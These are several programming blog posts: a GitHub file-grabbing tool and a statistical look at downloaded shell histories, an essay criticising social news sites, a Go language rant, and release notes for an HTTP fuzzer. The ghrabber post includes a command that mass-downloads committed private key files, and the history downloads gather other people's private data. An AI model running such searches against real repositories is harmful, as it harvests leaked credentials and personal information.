<p>Github recently introduced hugely <a href="https://github.com/blog/1381-a-whole-new-code-search">improved code
search</a>, one of those rare
moments when a service I use adds a feature that directly and measurably
improves my life. Predictably, there was soon a
<a href="http://www.webmonkey.com/2013/01/users-scramble-as-github-search-exposes-passwords-security-details/">flurry</a>
<a href="http://www.scmagazine.com.au/News/330152,passwords-ssh-keys-exposed-on-github.aspx">of</a>
<a href="http://arstechnica.com/security/2013/01/psa-dont-upload-your-important-passwords-to-github/">breathless</a>
stories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has
security or privacy implications, a law of the universe almost as solid as the
second law of thermodynamics. We saw this with <a href="http://www.securityfocus.com/news/11417">Google's own code
search</a>, as well as <a href="http://en.wikipedia.org/wiki/Google_hacking">Google
proper</a>, Facebook's <a href="http://actualfacebookgraphsearches.tumblr.com/">Graph
Search</a> and even
<a href="http://www.wired.com/wiredenterprise/2013/02/microsoft-bing-fights-botnets/">Bing</a>.
A certain fraction of people will always make mistakes, and any sufficiently
powerful search will allow bad guys to find and take advantage of the outliers.</p>
<p>After the dust had settled a bit I started wondering what else we could do with
Github's search - other than snookering schmucks who checked in their private
keys. I'm always enticed by data, and the combination of search and the ability
to download raw checked-in files seemed like a promising avenue to explore. Let's
see what we can come up with.</p>
<h2 id="ghrabber-grab-files-from-github"><a href="https://github.com/cortesi/ghrabber">ghrabber</a> - grab files from GitHub</h2>
<p>First, some tooling. I've just released ghrabber, a simple tool that lets you
grab all files matching a search specification from GitHub. Here, for instance,
is an obvious wheeze - fetching all files with the extension ".key":</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">extension:key</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>Downloaded files are saved locally to files named <strong>user.repository</strong>. Existing
files with the same name are skipped, which means that you can reasonably
efficiently stop and resume a ghrab.</p>
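<p>The resume logic is as simple as it sounds - a sketch, with illustrative names rather than ghrabber's actual internals:</p>

```python
import os

def local_name(user: str, repo: str) -> str:
    # ghrabber's naming scheme: one local file per hit, "user.repository".
    return f"{user}.{repo}"

def to_fetch(hits, outdir="."):
    """Filter (user, repo) search hits down to those not yet saved,
    so an interrupted ghrab can be resumed cheaply."""
    existing = set(os.listdir(outdir)) if os.path.isdir(outdir) else set()
    return [(u, r) for u, r in hits if local_name(u, r) not in existing]
```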
<h2 id="shell-history-files">Shell history files</h2>
<p>I've been having a lot of fun exploring Github with ghrabber. I'll return to
this in future posts - today I'll start with a quick illustration of what can
be done. One type of difficult-to-find information that is sometimes checked in
to repos is shell history. Two simple ghrabber commands for the two most
popular shells are all we need:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">path:.bash_history</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>and</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">path:.zsh_history</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>After cleaning the data a bit, I had 234 history files varying in length from 1
line to just over 10 thousand, containing a total of 165k entries. I fed this
into <a href="http://pandas.pydata.org/">Pandas</a> for analysis, parsing each command
using a combination of hand-hacked heuristics and the built-in
<a href="http://docs.python.org/2/library/shlex.html">shlex</a> module. The remainder of
this post is a light exploration of some approaches to this dataset, steering
clear of the obvious and tediously well-covered security implications.</p>
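<p>The core of the analysis - what fraction of history files mention each command - can be sketched along these lines (a simplification of the hand-hacked heuristics mentioned above):</p>

```python
import shlex
from collections import Counter

def command_prevalence(histories):
    """Percentage of history files in which each command name appears.

    `histories` is a list of history files, each a list of command lines."""
    seen = Counter()
    for lines in histories:
        cmds = set()  # count each command at most once per file
        for line in lines:
            try:
                tokens = shlex.split(line)
            except ValueError:
                continue  # unbalanced quotes and other unparseable lines
            if tokens:
                cmds.add(tokens[0])
        seen.update(cmds)
    return {cmd: 100.0 * n / len(histories) for cmd, n in seen.items()}
```

<p>The resulting dict drops straight into a Pandas Series for sorting and plotting.</p>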
<div class="media">
<a href="topcmds.png">
<img src="topcmds.png" />
</a>
</div>
<p>One way to slice the data is to look at the percentage of history files a given
command appears in. This gives us a nice listing of the top commands by user
prevalence, which you can see in the graph on the left above. On the right, I've
taken the same list of commands, and checked how many invocations are preceded
by a <strong>man</strong> lookup for the command. This gives us an idea of which
commonly-used commands have difficult or unintuitive interfaces. It's
interesting that <strong>ln</strong> is right at the top of the list, considering how simple
the command syntax is. My theory is that everyone forgets the order of the
source and target files.</p>
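<p>A crude way to flag "commands people consult the manual for", along the lines described above - this version just checks whether a <code>man</code> lookup for a command occurs anywhere earlier in the same history, which is looser than the invocation-by-invocation check used for the graph:</p>

```python
def man_before_use(history):
    """Commands whose use is preceded, somewhere earlier in the same
    history file, by a `man` lookup for that command."""
    manned = set()
    flagged = set()
    for line in history:
        tokens = line.split()
        if not tokens:
            continue
        if tokens[0] == "man" and len(tokens) > 1:
            manned.add(tokens[1])
        elif tokens[0] in manned:
            flagged.add(tokens[0])
    return flagged
```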
<div class="media">
<a href="editors.png">
<img src="editors.png" />
</a>
</div>
<div class="media">
<a href="tmuxes.png">
<img src="tmuxes.png" />
</a>
</div>
<p>Since we have a list of the most widely used commands, it's also trivial to do
silly popularity comparisons. Above is the obvious look at the state of the
editor wars (vim is winning, folks), and a check on how
<a href="http://tmux.sourceforge.net/">tmux</a> is doing in supplanting screen (the faster
the better).</p>
<div class="media">
<a href="args-ssh.png">
<img src="args-ssh.png" />
</a>
</div>
<div class="media">
<a href="args-mkdir.png">
<img src="args-mkdir.png" />
</a>
</div>
<div class="media">
<a href="args-rm.png">
<img src="args-rm.png" />
</a>
</div>
<div class="media">
<a href="args-ls.png">
<img src="args-ls.png" />
</a>
</div>
<p>Another interesting thing to do is to look at the most commonly used flags to
commands. I think having "real data" on command use may well guide us to design
better command-line interfaces. I'd love to know the most common invocation
flags for some of the tools I write.</p>
<p>I'll stop there. The data pool in this case is very deep, and there are a huge
range of interesting bits of command-line ethnography that could be done. Stay
posted for more in the coming weeks.</p>
The trouble with social news
2013-01-24T00:00:00+00:00
2013-01-24T00:00:00+00:00
https://corte.si/posts/socialmedia/trouble-with-social-news/
<p>There is something terribly awry with the social news ecosystem. This is a
feeling that's been growing on me over the last few years, and is the reason why
I've cut both <a href="http://reddit.com">Reddit</a> and <a href="http://news.ycombinator.com">Hacker
News</a> (who together constitute pretty much all of
"social news") out of my information diet. Although I've mulled over things in
various conversations, I've never actually tried to put my feeling of unease in
writing, until today. What's spurring me into action is a <a href="http://yann.lecun.com/ex/pamphlets/publishing-models.html">proposal by Yann
LeCun</a> that a model
similar to social news be adopted for scientific peer review - self-assembled
Reviewing Entities voting on streams of submitted papers, regulated by a
reputation system for authors and reviewers. Basically, this is science a la
Reddit: complete with subreddits, karma and upboats. I find the idea frankly
terrifying.</p>
<p>I guess it's time, then, to put finger to keyboard and lay out what disquiets
me about social news.</p>
<h2 id="karma-corrupts">Karma Corrupts</h2>
<p>You start by introducing a reputation mechanism like
<a href="http://www.reddit.com/wiki/faq#toc_9">karma</a> to improve some outcome - say, to
increase the quality of comments, or to apply a threshold to restrict voting to
trustworthy community members. This seems like a plausible and even elegant
mechanism at first, until you discover the terrible side-effects.</p>
<p>Humans are fundamentally status-seeking social apes, and you've now introduced
a visible measure of social worth that people will be driven to maximize. In
the real world, we have a word for those who spend their lives accumulating
karma - we call them politicians. And so, within karma communities, we see the
rise of a political class - persuasive centrists who cater (perhaps
unconsciously) to a constituency, and who express (perhaps eloquently) opinions
calculated to appeal to the masses and avoid controversy. Hacker News and many
subreddits are dominated by people like this, whose comments are largely
predictable and rarely add anything new or unexpected to the conversation.</p>
<p>At the bottom end of the food chain, we have a different class of creature with
the same basic aim as the politicians, but without the persuasive charm needed
to pull off the political approach. These are the karma whores, who use a
mixture of frank pandering, provocation and calculated outrage to achieve the
same aims.</p>
<p>The karma maximization game often acts contrary to the goals we aimed to
achieve by introducing karma in the first place: the tenor of the community
suffers, the diversity of opinion declines, and the karma whores post pictures
of their cats everywhere.</p>
<h2 id="the-lossy-sieve">The Lossy Sieve</h2>
<p>Go and have a look at the <a href="http://news.ycombinator.com/newest">new story submission
queue</a> on Hacker News. Scroll through a few
pages, and pay attention to the stories stuck at one vote - they will most
likely never receive another upvote and will die in obscurity. Now, go look at
the <a href="http://news.ycombinator.com/">front page</a>. When I do this exercise I'm
struck by the fact that there's plenty of crap on the front page, and quite a
bit of good stuff in the submission queue languishing in obscurity. So, quality
can't be the sole metric here - what determines what gets onto the front page
and what doesn't?</p>
<p>Lets try a thought experiment. First, set up a small number of voting accounts - say,
10 or so. Now, in the new submission queue, pick 5 random stories every
hour, and give them a small number of upvotes soon after they are submitted. I
predict that you will find that stories that received this small initial boost
are vastly more likely to end up on the front page. If I'm right, then chance
dominates story selection - as long as an article exceeds some basic quality
threshold, it all depends on who happens to see the story soon after it is
submitted, and whether the spirit moves them to vote. Note that this is not the
case at the extremes - frankly bad content won't be upvoted, and really
important stories will usually find their way to the top. The lossy sieve
phenomenon affects everything in between.</p>
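<p>The thought experiment can be mocked up as a toy simulation. All the numbers here are synthetic and chosen purely to illustrate the compounding mechanism - early votes raise visibility, and visibility attracts further votes:</p>

```python
import random

def simulate(n_stories=2000, boost_frac=0.1, seed=7):
    """Toy model: every story has identical middling quality, but a random
    fraction gets 3 early upvotes. Returns front-page rates per group."""
    rng = random.Random(seed)
    front_page = {"boosted": 0, "plain": 0}
    counts = {"boosted": 0, "plain": 0}
    for _ in range(n_stories):
        boosted = rng.random() < boost_frac
        votes = 3 if boosted else 0
        for _hour in range(24):
            # Chance of being seen (and upvoted) grows with current votes.
            if rng.random() < 0.05 + 0.03 * votes:
                votes += 1
        kind = "boosted" if boosted else "plain"
        counts[kind] += 1
        if votes >= 10:  # arbitrary "front page" threshold
            front_page[kind] += 1
    return {k: front_page[k] / counts[k] for k in counts}
```

<p>Under this model, identical stories that happen to get a small initial nudge reach the threshold far more often - which is the whole point: chance, not quality, separates them.</p>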
<p>What this boils down to is that social news doesn't provide an effective filter - good
content gets lost, and mediocre content finds its way onto our screens.</p>
<h2 id="the-pinhole-effect">The Pinhole Effect</h2>
<p>In social news, the front page is king. Most users never go beyond the first or
second page of top stories. However, front-page real estate is incredibly
limited compared to the volume of submissions on most popular subreddits and on
Hacker News. The effect of this is that we're looking at a fast-flowing river
of information through a pinhole. Even assuming that the selection mechanism
works flawlessly, what you see on the front page is a small sliver of the
total, chosen through a consensus mechanism that takes no account of individual
variation in tastes and interests. The news you see is not tailored to <em>you</em> -
it's tailored to some abstract, average participant, with all the rough edges
of individuality smoothed away. The effect of this is that even at its best,
the stories that emerge from the social news system feel like a predictable
pablum dished up by the hivemind. The subreddit system tries to improve this by
allowing communities to self-assemble around interests, but the pinhole effect
still dominates in busy subreddits like
<a href="http://reddit.com/r/programming">/r/programming</a>.</p>
<h2 id="gaming-the-system">Gaming The System</h2>
<p>Social news systems are eminently gameable, and cheating is rife. Part of the
reason for this is that a story's destiny depends on a relatively small number
of votes. If your story has any merit at all, you significantly increase the
likelihood that it will end up on the front page by giving it a small nudge at
the beginning of its life. If it has no merit whatsoever, you can still force
it onto people's screens with a few tens or hundreds of votes. Conversely, you
can use the same effect to censor and oppress views you disagree with if your
social news site has downvotes. Anyone who's kept an eye on these things can
rattle off examples of gaming in action: the <a href="http://en.wikipedia.org/wiki/Digg_Patriots">voting
rings</a>, the <a href="http://www.reddit.com/r/reddit.com/comments/b7e25/today_i_learned_that_one_of_reddits_most_active/">"social media
consultants"</a>,
the <a href="http://www.reddit.com/r/shitredditsays">vigilante thought-polizei</a>,
the <a href="http://www.reddit.com/comments/2n2tu/ron_paul_on_the_debate_my_opponents_called_for/c2n5v8">political
operators</a>,
and dozens of other types of manipulation and villainy. What's more - these
visible scandals are just the tip of the iceberg. Eyeballs are valuable, and
there's an active arms race with social news sites on the one side, and a dark
army of spammers, scammers and true believers on the other. How much of what we
see is affected by this type of cheating? We just don't know, but my suspicion
is that the effect is significant.</p>
<p>The point here is broader than any particular instance of gaming. It's that
social news sites are structurally susceptible to manipulation in ways that
can't be fixed without changing the core of their operation. A system like this
might be good enough to deliver <a href="http://knowyourmeme.com/memes/rage-comics">rage
comics</a>, but I feel queasy trusting
it any further.</p>
<h2 id="community-collapse-disorder">Community Collapse Disorder</h2>
<p>My final beef with social news is a problem that it shares with pretty much all
online communities, especially technical ones. We're all familiar with the
life-cycle of technical forums. They start with a small community of insiders
who create value, which then attracts more people to participate, which then
dilutes the quality of the contributions (and often introduces a few
pathological bad actors), which then causes the good contributors to move on,
which causes the magic well to dry up. Everyone then takes their toys and moves
to the next community, and the cycle repeats. We saw this with Usenet and the
original C2 wiki, and we are seeing it now with Hacker News and many technical
subreddits all at various points in this life-cycle.</p>
<p>I believe that Community Collapse Disorder is one of the Big Problems online
that we don't yet have a satisfactory solution to. People are trying, though.
Hacker News, for instance, seems to be rather <a href="https://www.google.com/search?hl=en&q=site%3Anews.ycombinator.com+%22eternal+september%22">poignantly aware of its own
decline</a>,
with some of the <a href="http://al3x.net/2011/02/22/solving-the-hacker-news-problem.html">best of the old-timers calling for an
alternative</a>.
Paul Graham himself recognizes the issue, and has been tweaking things in
various ways to combat the phenomenon, without much success.</p>
<p>At the moment, we just don't know how to build online communities that are both
inclusive and stable. Democracy, here, seems to lead inevitably to decline, and
social news sites are no exception.</p>
<h2 id="a-better-way-forward">A better way forward?</h2>
<p>A big part of the reason I don't use social news anymore is that my existing
social networks have become so much more effective at turning up good content.
The absolute best source of news for me is simply the set of links shared by
the folks I follow on <a href="http://twitter.com/cortesi">Twitter</a>. I follow people
who post interesting content, and whom I trust to act as information filters
for me. Most of them share my technical interests, but some are interesting
because they are from my home town, or because they share some more esoteric
pursuit with me. So, the news stream I see is exactly tailored to me. At the
same time, there is also room for idiosyncrasy - if someone I follow shares
something left-field that tickles their fancy, I'll see it. In turn, I try to
be a responsible information filter for those who follow me - I find a link or
two worth tweeting on most days.</p>
<p>There are still things I miss - Twitter is great for sharing links, but is an
awful medium for technical discussion.
<a href="https://plus.google.com/106243676845481872244">Google+</a> could be a better
alternative, but just doesn't seem to have achieved liftoff for me. I would
also love better tools for aggregating and harvesting links from my social
network. At the moment I use <a href="http://flipboard.com">Flipboard</a> and
<a href="http://getprismatic.com">Prismatic</a>, but I have issues with both. On the
whole, though, these are quibbles. It seems to me that using social networks to
filter news is a better way forward - if I was tackling the social news
problem, I'd be building tools to support this process.</p>
Go: a nice language with an annoying personality
2013-01-18T00:00:00+00:00
2013-01-18T00:00:00+00:00
https://corte.si/posts/code/go/go-rant/
<p>Last week, I had the pleasure of attending <a href="http://dropbox.com">Dropbox</a>'s
annual company <a href="https://blog.dropbox.com/2012/03/hack-week-ii/">hack fest</a>. It
was a great opportunity to get a look at how Dropbox works internally, and
mingle with the smart and driven folks who make one of my favourite products. In
the spirit of hack week, my friend
<a href="http://twitter.com/alexdong">@alexdong</a> and I decided to do our project in Go. We'd
both wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful
that Go would turn out to hit a magical sweet spot: a light set of abstractions
hugging close to the machine, while still providing the indoor plumbing and
civilized conveniences of life that I had grown used to with languages like
Python. Five days of furious hacking later, I can report that Go might well
deliver on this promise, but has enough annoying personality quirks that I will
think twice about basing any more projects on it.</p>
<p>My main beef with Go has nothing to do with fundamental language design, and may
seem almost inconsequential at first glance. The Go compiler treats unused
module imports and declared variables as compile errors. This is great in theory
and is something you might well want to enforce before code can be committed,
but during the actual <em>process</em> of producing code it's nothing but an irksome,
unnecessary pain in the ass. Let's look at a concrete example, starting with a
snippet of code as follows <sup class="footnote-reference"><a href="#1">1</a></sup></p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>I'm a firm believer that printing stuff to screen is a programmer's best
debugging tool, so say we're hacking away and want to print the value of <strong>m</strong>
while running our unit tests. We change the code as follows, adding an import
for the "fmt" module and a call to Print:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
"</span><span style="color:#a3be8c;">fmt</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Print</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>Now we keep hacking, and want to comment out the print statement for a moment
like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
"</span><span style="color:#a3be8c;">fmt</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
</span><span style="color:#65737e;">//fmt.Print(m)
</span><span style="color:#c0c5ce;">...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>This is a compile error. We have to switch contexts, move to the top of the
module, also comment out the import, and then move back to the spot we're
really hacking on:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
</span><span style="color:#65737e;">//"fmt"
</span><span style="color:#c0c5ce;">)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
</span><span style="color:#65737e;">//fmt.Print(m)
</span><span style="color:#c0c5ce;">...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>A few seconds later, we want to re-enable the Print statement - so up we go
again to the top of the module to re-enable the import. This is even worse when
we want to, say, comment out the <strong>DoSomething</strong> call while hacking:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#65737e;">//DoSomething(m)
</span></code></pre>
<p>This is also a compile error because now <em>m</em> is unused. We have to hunt up in
our code to find the declaration, which could be explicit or implicit using an
<strong>:=</strong> assignment. So, in this case we find the declaration, and use the magic
underscore name to throw the offending value away:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">_</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#65737e;">//DoSomething(m)
</span></code></pre>
<p>That should fix it, right? Well, no. It turns out we've previously declared and
used <strong>err</strong> (a very common idiom), so this is still a compile error. We're
using the "declare and assign" syntax, but have no new variables on the
left-hand side of the ":=". So we need to make another tweak:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">_</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#65737e;">//DoSomething(m)
</span></code></pre>
<p>Five seconds later, we want to re-enable <strong>DoSomething</strong>, and now we have to
unwind the entire process.</p>
<p>The cumulative effect of all this is like trying to write code while someone
next to you randomly knocks your hands off the keyboard every few seconds.
It's a pointlessly pedantic approach that adds constant friction to your
write-compile-test cycle, breaks your flow, and just generally makes life a
little harder for very little benefit. There's no way to turn this mis-feature
off, no flag we can pass to the compiler to temporarily make this a warning
rather than an error while hacking<sup class="footnote-reference"><a href="#2">2</a></sup>.</p>
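<p>One partial escape hatch is Go's blank identifier: referencing a symbol through <strong>_</strong> counts as a use, so you can park an import or a variable without deleting it. The following is a minimal sketch of that idea, not an endorsed workflow - <strong>DoSomething</strong> is the hypothetical call from the snippets above, and the underscore lines should be deleted before committing:</p>

```go
package main

import (
	"fmt"
	"io/ioutil"
)

// While the fmt.Print calls below are commented out, this single reference
// keeps the "fmt" import alive, so the import block can stay untouched
// during a hacking session.
var _ = fmt.Print

func process(path string) error {
	m, err := ioutil.ReadFile(path)
	if err != nil {
		return err
	}
	// fmt.Print(m)
	_ = m // silences "m declared and not used" while the call below is disabled
	// DoSomething(m)
	return nil
}

func main() {
	if err := process("/no/such/file"); err != nil {
		fmt.Println("error:", err)
	}
}
```

<p>It works, but it just trades one kind of bookkeeping for another - now you have to remember to clean up the underscores afterwards.</p>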
<p>The irony of the situation is that I agree with the sentiment behind this. I
don't want dangling variables or imports in my codebase. And I agree that if
something is worth warning about it's worth making it an error. The mistake is
to confuse the state we want at the conclusion of a unit of hacking<sup class="footnote-reference"><a href="#3">3</a></sup>, with
what we need at every point in between, during the write-compile-test cycle.
This cycle is the core of the process of actually producing code, and the
<a href="http://xkcd.com/353/">exhilarating sense of weightlessness</a> that you get when
hacking in Python is largely due to the fact that the language works really,
really hard to optimize this process. Go has given away this feeling of
exhilaration, basically for nothing.</p>
<p>Despite all this, it's still possible that the benefits of Go do outweigh its
irritating personality. Interfaces, memory management, first-class concurrency
and static type checking is a knockout combination, and the language in general
has something of the taut practicality that I love in C. So, despite the
rantiness of this post, I'll keep hacking on our project and make sure I
produce a few thousand more lines of code before making a final call on the
language. Look for a project release and a blog post along these lines in the
coming months.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>Ellipses indicate "an arbitrary amount of intervening code"</p>
</div>
<div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup>
<p>I edited this paragraph a bit for tone. I originally accused the Go
documentation of being faintly smug about all of this - which is not fair, and
doesn't add anything to the argument.</p>
</div>
<div class="footnote-definition" id="3"><sup class="footnote-definition-label">3</sup>
<p>Why don't we have a word for this? By "unit of hacking", I mean the work
that goes on between starting to hack on a change-set and doing a commit. At the
beginning and at the end, the code is in a clean state, but in between there
are many periods of transition where cleanliness requirements are relaxed.</p>
</div>
Released: pathod 0.3
2012-11-16T00:00:00+00:00
2012-11-16T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_3/
<p>I've just released <a href="http://pathod.net">pathod 0.3</a>, which beefs up
<a href="http://pathod.net/docs/pathoc">pathoc</a>'s fuzzing capabilities, improves the
spec language and includes lots of bugfixes and other small tweaks. Get it while
it's hot!</p>
<h2 id="better-fuzzing">Better fuzzing</h2>
<p>A major focus of this release is to improve
<a href="http://pathod.net/docs/pathoc">pathoc</a>'s capabilities as a basic fuzzing tool.
I've had fun <a href="https://corte.si/posts/code/pathod/pythonservers/">breaking webservers</a>
with pathoc, and it's even come in handy in my Day Job. Here's a quick summary
of how things have changed.</p>
<ul>
<li>The <strong>-x</strong> flag tells pathoc to explain its requests. This prints out an
expanded pathoc query specification, with all randomly generated content and
query modifications resolved. If you trigger an exception, you can precisely
replay the offending query using this explanation.</li>
<li>The options for outputting requests and responses have been expanded hugely.
First, the <strong>-q</strong> and <strong>-r</strong> flags tell pathoc to dump complete records of
requests and responses respectively. This data is sniffed by instrumenting
the socket, so is canonical regardless of our ability to interpret returned
data. The <strong>-x</strong> option makes pathoc dump this data in hexdump format
(otherwise unprintable characters are escaped to preserve your terminal).</li>
<li>A number of options have been added to let you ignore expected responses.
<strong>-C</strong> takes a comma-separated list of response codes to ignore. <strong>-T</strong>
ignores server timeouts. This lets you home in on the exceptional responses
that you care about, and ignore the rest.</li>
</ul>
<h2 id="language-improvements">Language improvements</h2>
<ul>
<li>I've simplified response specifications by making the response message a
standard component with the "r" mnemonic.</li>
<li>I've added the "u" mnemonic to request specifications, as a shortcut for
specifying the User-Agent header:</li>
</ul>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">get:/:u"My Weird User-Agent"
</span></code></pre>
<p>We also have a small library of representative User-Agent strings that can be
used instead of specifying your own. For example, this specifies the
GoogleBot User-Agent string:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">get:/:ug
</span></code></pre>
<p>The list of available shortcuts is in the docs, and can be listed from the
commandline using the <strong>--show-uas</strong> flag to pathoc:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> ./pathoc --show-uas
User agent strings:
a android
l blackberry
b bingbot
c chrome
f firefox
g googlebot
i ie9
p ipad
h iphone
s safari
</span></code></pre>
pathoc: break all the Python webservers!
